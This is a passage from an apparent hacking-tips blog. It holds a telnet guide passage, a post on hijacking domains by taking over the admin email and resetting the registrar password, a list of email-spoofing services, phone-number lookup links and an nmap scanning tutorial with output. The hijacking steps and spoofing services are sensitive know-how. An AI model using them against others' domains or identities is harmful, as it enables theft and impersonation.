style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">See <u>http://happyhacker.org/links2.shtml#shells <../links2.shtml></u> for organizations that will give you free shell accounts. You can telnet into these. <o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm 5pt 36pt; text-indent: -18pt;"><!--[if !supportLists]--><span style="font-family: Symbol; font-size: 12.0pt; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">         </span></span><!--[endif]--><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">Ask Internet Service Providers for shell accounts. Some offer them, although most don't. <o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm 5pt 36pt; text-indent: -18pt;"><!--[if !supportLists]--><span style="font-family: Symbol; font-size: 12.0pt; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">         </span></span><!--[endif]--><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">Set up a telnet server on your own computer (see instructions below). Yes, once you are running a telnet server, you can telnet from your computer back into your computer. Simply give the command "telnet 127.0.0.1". <o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm 5pt 36pt; text-indent: -18pt;"><!--[if !supportLists]--><span style="font-family: Symbol; font-size: 12.0pt; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">         </span></span><!--[endif]--><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">Make friends with people who run Internet computers with telnet servers. <o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><b><span style="font-family: "Times New Roman","serif"; font-size: 14.0pt;">Why you May Not Want to Telnet</span></b><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;"><o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">If you love your shell account server, don't ever, ever telnet or ftp into it. I recommend Ssh or Openssh for logging into remote computers? The telnet (and ftp) protocol is a "clear text" transmission. That means that computer on the same LAN as either You or your destination computer, or any computer on any LAN or network path through which your connection passes can steal your login name, password or anything else that goes across your connection. Ssh and OpenSsh encrypt all communications so no one can snoop on you.<o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><b><span style="font-family: "Times New Roman","serif"; font-size: 14.0pt;">How to Install a Telnet Server on your Windows Computer</span></b><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;"><o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">Usually you can't telnet into a Windows home computer. The reason is, they aren't running telnet servers. Here's how to get a telnet server on your home Windows computers so your friends and you can telnet in and play.<o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">For Windows NT, the Options Pack includes a primitive telnet server.<o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">For Windows 95/98/NT and 2000, you also can install shareware or commercial telnet servers. Check out http://www.winfiles.com, or do a web search.<o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">Of course installing a telnet server makes your computer vulnerable to all sorts of trouble from hackers. It's your funeral, don't come crying top me if a telnet visitor destroys your computer</span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><b><span style="font-family: "Times New Roman","serif"; font-size: 14.0pt;">How to Turn off a Telnet Server on your Unix-type Computer</span></b><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;"><o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">If you go online with Linux or other Unix-type computer, a telnet server is the easiest way to ensure you get destroyed by a malicious hacker. Here's how to prevent this. On most of these, the file /etc/inetd.conf launches most of your servers. Edit the file to put a "#" in front of the line that has telnet in it and either reboot your computer or kill and restart inetd.<o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">If your computer doesn't use inetd to launch services, you should be able to find telnetd under /etc/init.d.<o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">Install ssh instead and only use that to log into your shell account.<o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><b><span style="font-family: "Times New Roman","serif"; font-size: 14.0pt;">How to Explore Computers Using Telnet</span></b><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;"><o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">Even if a computer doesn't have a telnet server, there are lots of fun and even legal things to do to it using telnet. The easiest thing to do is extract "banners" from a victim computer. A banner is a message a computer will often give when you telnet to a port that is running an Internet server of some sort.<o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">For example, most mail sending servers use port 25. To telnet to port 25 from Win 2000 or a Unix shell, simply type:<o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">telnet <hostname or IP address> 25<o:p></o:p></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">Windows 95, 98 and NT make it a tiny bit harder.</span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">A quick search of the Bugtraq archives at <u><http://www.securityfocus.com/></u>revealed horrid things a criminal could do to that Mercur mail server. Since I think it is more fun to be nice, I told someone at the company using this mail server about the problems. He invited me to vacation at his beautiful Swiss home, where he and his wife keep horses and take long trail rides in the Alps. Golly, that is much more fun than breaking into a computer!<o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">Right about now some elite ueberhaxorz are probably reading this and saying "What a lamer Meinel is! We can do the same thing by running nmap."<o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">They are right, you can learn the same things by running a port scanning program such as nmap (available at <u><http://www.insecure.org/></u>). However, I am quite careful about under what circumstances I run any port scanner. In order to get information on what programs are running on what ports, you must run a port scanner in a mode that will probably convince the owner of the victim computer that you are a criminal. He or she may persuade your online service provider to cancel your account.<o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">The other reason to analyze computers using telnet is that you learn more. It's the difference between eating at McDonalds and learning how to cook.<o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><b><span style="font-family: "Times New Roman","serif"; font-size: 14.0pt;">How to Break into Web Sites Using Telnet</span></b><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;"><o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">You don't have to use a web browser to access files on a web site. All you need to do is:<o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">telnet <victimcomputer> 80<o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">Or specify port 80 in a Windows telnet.<o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">If you are using Windows 95/98/NT, whenever you are NOT logging into a telnet account, you should enable local echo. Otherwise whatever you type in (unless you are in a telnet account) will not show on the screen. To enable local echo, click Terminal --> Preferences --> Local Echo.<o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">So how do you send stuff back to the webserver? Try this:<o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">GET / HTTP/1.0<br /><your command here><o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">What kinds of commands can you send? The book <u>Hackproofing Your Network <../bookstore/general.shtml></u> (by Ryan Russell of Securityfocus.com and Stance Cunningham) suggests a fun and harmless hack. Create and store a bogus cookie in the location on your web browser that stores cookies. (Find it by searching for the file "cookies.txt".) Name your bogus cookie something like "MyBogusCookie." Then telnet to the victim webserver and give something like this command:<o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">GET / HTTP/1.0<br />User-Agent: HaveABogusCookieThisIsAJoke 123.4<br />Cookie: /; MyBogusCookie<o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">The <u>Überhacker! -- How to Break into Computers <../uberhacker/index.shtml></u> book details a number of serious attacks you can perform through sending funny input to a webserver. Basically, you need to learn how to write shell programs, and then find ways to get them to be run by the webserver. I'm not going to explain them here, however. These attacks, when carried out against a vulnerable webserver, are so easy that little kids could do them, and I don't want to be responsible for their behavior. It's much harder for little kids to get a hold of Russell's and my books than it is for them to read this GTMHH on the Happy Hacker website.<o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">So are you dying to know what to send a webserver in order to break into it, without having to buy a book? Here are some hints. How to do this will depend on what webserver it is, what operating system it runs on, whether its security weaknesses have been fixed, and whether the web designer has used things such as Common Gateway Interface (CGI) or Server Side Includes (SSIs) that have weaknesses in them.<o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">You will have to research these issues at Web sites that archive vulnerabilities and exploits such as <u><http://www.securityfocus.com/></u>and <u><http://packestorm.securify.com/></u>. You will need to study web site programming (HTML -- hypertext markup language, CGI and SSIs) and shell programming. You will need to learn webserver commands (documented at <u><http://www.w3.org/hypertext/WWW/markup/Markup.html></u>). You will have to use your brain and be persistent.<o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">But at least if you come across a telnet exploit, now you know the answer to the question "where do I type that command?"<o:p></o:p></span></div></div>

What is TELNET ? & How to Use TELNET?

Telnet: the Number One Hacker Tool In this Guide you will learn: ·          What is telnet? ·          How to telnet ·          How to get...

+ Read more »

Domain Hijacking – How to Hijack a Domain

<div dir="ltr" style="text-align: left;" trbidi="on"><br /><br /><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-family: Arial, sans-serif;">Domain hijacking is a process by which Internet Domain Names are stolen from it’s legitimate owners. Domain hijacking is also known as domain theft. Before we can proceed to know how to hijack domain names, it is necessary to understand how the domain names operate and how they get associated with a particular web server (website).</span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-family: Arial, sans-serif;"><br /></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-family: Arial, sans-serif;">The operation of domain name is as follows</span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-family: Arial, sans-serif;">Any website say for example gohacking.com consists of two parts. The domain name(gohacking.com) and the web hosting server where the files of the website are actually hosted. In reality, the domain name and the web hosting server (web server) are two different parts and hence they must be integrated before a website can operate successfully. The integration of domain name with the web hosting server is done as follows.</span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><br /><a name='more'></a><span style="font-family: Arial, sans-serif;"><br /></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-family: Arial, sans-serif;">1. After registering a new domain name, we get a control panel where in we can have a full control of the domain. </span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-family: Arial, sans-serif;"><br /></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-family: Arial, sans-serif;">2. From this domain control panel, we point our domain name to the web server where the website’s files are actually hosted.</span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-family: Arial, sans-serif;"><br /></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-family: Arial, sans-serif;">For a clear understanding let me take up a small example.</span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-family: Arial, sans-serif;"><br /></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-family: Arial, sans-serif;">John registers a new domain “abc.com” from an X domain registration company. He also purchases a hosting plan from Y hosting company. He uploads all of his files (.html, .php, javascripts etc.) to his web server (at Y). From the domain control panel (of X) he configures his domain name “abc.com” to point to his web server (of Y). Now whenever an Internet user types “abc.com”, the domain name “abc.com” is resolved to the target web server and the web page is displayed. This is how a website actually works.</span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-family: Arial, sans-serif;">What happens when a domain is hijacked</span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-family: Arial, sans-serif;"><br /></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-family: Arial, sans-serif;">Now let’s see what happens when a domain name is hijacked. To hijack a domain name you just need to get access to the domain control panel and point the domain name to some other web server other than the original one. So to hijack a domain you need not gain access to the target web server.</span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-family: Arial, sans-serif;"><br /></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-family: Arial, sans-serif;">For example, a hacker gets access to the domain control panel of  “abc.com”. From here the hacker re-configures the domain name to point it to some other web server (Z). Now whenever an Internet user tries to access “abc.com” he is taken to the hacker’s website (Z) and not to John’s original site (Y).</span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-family: Arial, sans-serif;"><br /></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-family: Arial, sans-serif;">In this case the John’s domain name (abc.com) is said to be hijacked</span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-family: Arial, sans-serif;">How the domain names are hijacked</span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-family: Arial, sans-serif;"><br /></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-family: Arial, sans-serif;">To hijack a domain name, it’s necessary to gain access to the domain control panel of the target domain. For this you need the following ingredients</span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-family: Arial, sans-serif;"><br /></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-family: Arial, sans-serif;">1. The domain registrar name for the target domain.</span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-family: Arial, sans-serif;"><br /></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-family: Arial, sans-serif;">2. The administrative email address associated with the target domain. </span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-family: Arial, sans-serif;"><br /></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-family: Arial, sans-serif;">These information can be obtained by accessing the WHOIS data of the target domain. To get access the WHOIS data, goto whois.domaintools.com, enter the target domain name and click on Lookup. Once the whois data is loaded, scroll down and you’ll see Whois Record. Under this you’ll get the “Administrative contact email address”.</span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-family: Arial, sans-serif;"><br /></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-family: Arial, sans-serif;">To get the domain registrar name, look for something like this under the Whois Record. “Registration Service Provided By: XYZ Company”. Here XYZ Company is the domain registrar. In case if you don’t find this, then scroll up and you’ll see ICANN Registrar under the “Registry Data”. In this case, the ICANN registrar is the actual domain registrar.</span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-family: Arial, sans-serif;"><br /></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-family: Arial, sans-serif;">The administrative email address associated with the domain is the backdoor to hijack the domain name. It is the key to unlock the domain control panel. So to take full control of the domain, the hacker will hack the administrative email associated with it.</span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-family: Arial, sans-serif;"><br /></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-family: Arial, sans-serif;">Once the hacker take full control of this email account, he will visit the domain registrar’s website and click on forgot password in the login page. There he will be asked to enter either the domain name or the administrative email address to initiate the password reset process. Once this is done all the details to reset the password will be sent to the administrative email address. Since the hacker has the access to this email account he can easily reset the password of domain control panel. After resetting the password, he logs into the control panel with the new password and from there he can hijack the domain within minutes.</span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-family: Arial, sans-serif;"><br /></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-family: Arial, sans-serif;">How to protect the domain name from being hijacked</span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-family: Arial, sans-serif;"><br /></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-family: Arial, sans-serif;">The best way to protect the domain name is to protect the administrative email account associated with the domain. If you loose this email account, you loose your domain.. Another best way to protect your domain is to go for private domain registration. When you register a domain name using the private registration option, all your personal details such as your name, address, phone and administrative email address are hidden from the public. So when a hacker performs a WHOIS lookup for you domain name, he will not be able to find your name, phone and administrative email address. So the private registration provides an extra security and protects your privacy. Private domain registration costs a bit extra amount but is really worth for it’s advantages. Every domain registrar provides an option to go for private registration, so when you purchase a new domain make sure that you select the private registration option.</span></div><br /></div>

Domain Hijacking – How to Hijack a Domain

Domain hijacking is a process by which Internet Domain Names are stolen from it’s legitimate owners. Domain hijacking is also known as domai...

+ Read more »

How to Spoof an Email Addresses?

<div dir="ltr" style="text-align: left;" trbidi="on">If you want to send email from your friend`s email address then you can use following services. keep in mind that it`s not actually send email from your friend`s mail address ,but the person who receive email  see your friend`s email address in sender<br /><br /><a href="http://www.hoaxmail.co.uk/" target="_blank"><span style="color: black;">www.hoaxmail.co.uk</span></a><br /><br /><a href="http://anonymailer.net/" target="_blank"><span style="color: black;">anonymailer.net </span></a><br /><br /><a href="http://emkei.cz/" target="_blank"><span style="color: black;">emkei.cz</span></a><br /><br />Above all emkei.cz  is my favourite because it provide some advance option like email-header, reply to,cc etc.<br /><br />You can also send from your cmd ,but for that purpose you need S.M.T.P server name  of your I.S.P. so use above services only for fun .</div>

How to Spoof an Email Addresses?

If you want to send email from your friend`s email address then you can use following services. keep in mind that it`s not actually send ema...

+ Read more »

BSNL search & Reliance Mobile search

<div dir="ltr" style="text-align: left;" trbidi="on">If you want to inquiry about any BSNL residential number, then it`s link below<br /><a href="http://dq.wdc.bsnl.co.in/bsnl-web/residentialSearch.seam" target="_blank"><span style="color: black;">http://dq.wdc.bsnl.co.in/bsnl-web/residentialSearch.seam</span></a><br /><br />And if you want to know about details of any reliance number, there is below link.But unfortunately it is provide now only surname or First name.<br /><br /><a href="http://myservices.relianceada.com/captureInstantRecharge.do" target="_blank"><span style="color: black;">http://myservices.relianceada.com/captureInstantRecharge.do</span></a></div>

BSNL search & Reliance Mobile search

If you want to inquiry about any BSNL residential number, then it`s link below http://dq.wdc.bsnl.co.in/bsnl-web/residentialSearch.seam And ...

+ Read more »

IP and Port scanning using ‘nmap (Network Mapper)’ in Ubuntu

<div dir="ltr" style="text-align: left;" trbidi="on">Nmap is a powerful scanner available in Unix/Linux system. It’s very usefull for network exploration and security auditing. It was designed to rapidly scan large networks, although it works fine again single hosts.<br /><br />It’s very easy to install nmap in Ubuntu, just download from the internet.<br /><br />sudo apt-get install nmap<br /><br />In this practice, I used 2 computer.<br /><br /><h4 style="text-align: left;">PC-01, IP = 192.168.0.3 (OpenSuse 10.1) with Kernel 2.6.16.13-4-default</h4><h4 style="text-align: left;"><br />PC-02, IP = 192.168.0.2 (Ubuntu Feisty)</h4><br />I run nmap from Ubuntu to scan PC-01.<br /><br />IP Scanning with range 192.168.0.0 – 192.168.0.255sudo nmap -sP 192.168.0.0/24<br />Starting Nmap 4.20 ( http://insecure.org ) at 2007-10-16 21:51 WIT<br /><br />Host 192.168.0.2 appears to be up.<br /><br />caught SIGINT signal, cleaning up<br /><br /><br /><br /><h3 style="text-align: left;">IP Scanning with range 192.168.0.1 – 192.168.0.254</h3><h3 style="text-align: left;">sudo nmap -sP 192.168.0.1-254</h3><br />Starting Nmap 4.20 ( http://insecure.org ) at 2007-10-16 21:53 WIT<br /><br />Host 192.168.0.2 appears to be up.<br /><br />Host 192.168.0.3 appears to be up.<br /><br />MAC Address: 00:0D:88:B3:72:F3 (D-Link)<br /><br />Nmap finished: 255 IP addresses (2 hosts up) scanned in 31.242 seconds<br /><br /><br /><h3 style="text-align: left;">Port Scanning with range port 100 – port 139</h3><h3 style="text-align: left;">sudo nmap 192.168.0.3 -p100-139</h3><br />Starting Nmap 4.20 ( http://insecure.org ) at 2007-10-16 22:06 WIT<br /><br />Interesting ports on 192.168.0.3:<br /><br />Not shown: 38 filtered ports<br /><br />PORT STATE SERVICE<br /><br />113/tcp closed auth<br /><br />139/tcp open netbios-ssn<br /><br />Nmap finished: 1 IP address (1 host up) scanned in 24.914 seconds<br /><br /><br /><div style="text-align: left;">For 40 ports, it took almost 25 seconds, so it will take much longer if you want to scan from 1-65535 (all ports in a computers).</div><br /><h3 style="text-align: left;">Scanning Operating system on target IP</h3><h3 style="text-align: left;">sudo nmap -O 192.168.0.3</h3><br />Starting Nmap 4.20 ( http://insecure.org ) at 2007-10-16 22:20 WIT<br /><br />Interesting ports on 192.168.0.3:<br /><br />Not shown: 1693 filtered ports<br /><br />PORT STATE SERVICE<br /><br />80/tcp open http<br /><br />113/tcp closed auth<br /><br />139/tcp open netbios-ssn<br /><br />445/tcp open microsoft-ds<br /><br />MAC Address: 00:0D:88:B3:72:F3 (D-Link)<br /><br />Device type: general purpose|specialized|WAP|storage-misc<br /><br />Running (JUST GUESSING):Linux 2.6.X|2.4.X (97%), Atmel Linux 2.6.X (91%), Siemens linux (91%), Linksys Linux 2.4.X (89%), Asus Linux 2.4.X (89%), Maxtor Linux 2.4.X (89%), Inventel embedded (88%)<br /><br />Aggressive OS guesses: Linux 2.6.13 – 2.6.18 (97%), Linux 2.6.11 – 2.6.15 (Ubuntu or Debian) (93%), Linux 2.6.14 – 2.6.17 (92%), Linux 2.6.17 – 2.6.18 (x86) (92%), Linux 2.6.17.9 (X86) (92%), Linux 2.6.15-27-686 (Ubuntu Dapper, X86) (92%), Linux 2.6.9-42.0.2.EL (RedHat Enterprise Linux) (92%), Linux 2.6.9 – 2.6.12 (x86) (92%), Atmel AVR32 STK1000 development board (runs Linux 2.6.16.11) (91%), Siemens Gigaset SE515dsl wireless broadband router (91%)<br /><br />No exact OS matches for host (test conditions non-ideal).<br /><br />Network Distance: 1 hop<br /><br />OS detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .<br /><br />Nmap finished: 1 IP address (1 host up) scanned in94.942 seconds<br /><br /><h3 style="text-align: left;">nmap Faster Execution</h3><br />If you want to make faster scan, use-T4option on nmap command..<br /><div style="text-align: left;"><br /></div><h3 style="text-align: left;">$sudo nmap -A -T4 192.168.0.3</h3><div style="text-align: left;"><br />Starting Nmap 4.20 ( http://insecure.org ) at 2007-10-16 22:42 WIT<br /><br />Interesting ports on 192.168.0.3:<br /><br />Not shown: 1693 filtered ports<br /><br />PORT STATE SERVICE VERSION<br /><br />80/tcp open http Apache httpd 2.2.0 ((Linux/SUSE))<br /><br />113/tcp closed auth<br /><br />139/tcp open netbios-ssn Samba smbd 3.X (workgroup: HOME)<br /><br />445/tcp open netbios-ssn Samba smbd 3.X (workgroup: HOME)<br /><br />MAC Address: 00:0D:88:B3:72:F3 (D-Link)<br /><br />Device type: general purpose|WAP|specialized|storage-misc|broadband router<br /><br />Running (JUST GUESSING) : Linux 2.6.X|2.4.X (97%), Siemens linux (93%), Atmel Linux 2.6.X (92%), Inventel embedded (89%), Linksys Linux 2.4.X (89%), Asus Linux 2.4.X (89%), Maxtor Linux 2.4.X (89%), Netgear embedded (87%)<br /><br />Aggressive OS guesses: Linux 2.6.13 – 2.6.18 (97%), Siemens Gigaset SE515dsl wireless broadband router (93%), Linux 2.6.11 – 2.6.15 (Ubuntu or Debian) (93%), Linux 2.6.15-27-686 (Ubuntu Dapper, X86) (93%), Atmel AVR32 STK1000 development board (runs Linux 2.6.16.11) (92%), Linux 2.6.14 – 2.6.17 (92%), Linux 2.6.17 – 2.6.18 (x86) (92%), Linux 2.6.17.9 (X86) (92%), Linux 2.6.9-42.0.2.EL (RedHat Enterprise Linux) (92%), Linux 2.6.9 – 2.6.12 (x86) (92%)<br /><br />No exact OS matches for host (test conditions non-ideal).<br /><br />Network Distance: 1 hop<br /><br />OS and Service detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .<br /><br />Nmap finished: 1 IP address (1 host up) scanned in 58.830 seconds</div></div>

IP and Port scanning using ‘nmap (Network Mapper)’ in Ubuntu

Nmap is a powerful scanner available in Unix/Linux system. It’s very usefull for network exploration and security auditing. It was designed ...

+ Read more »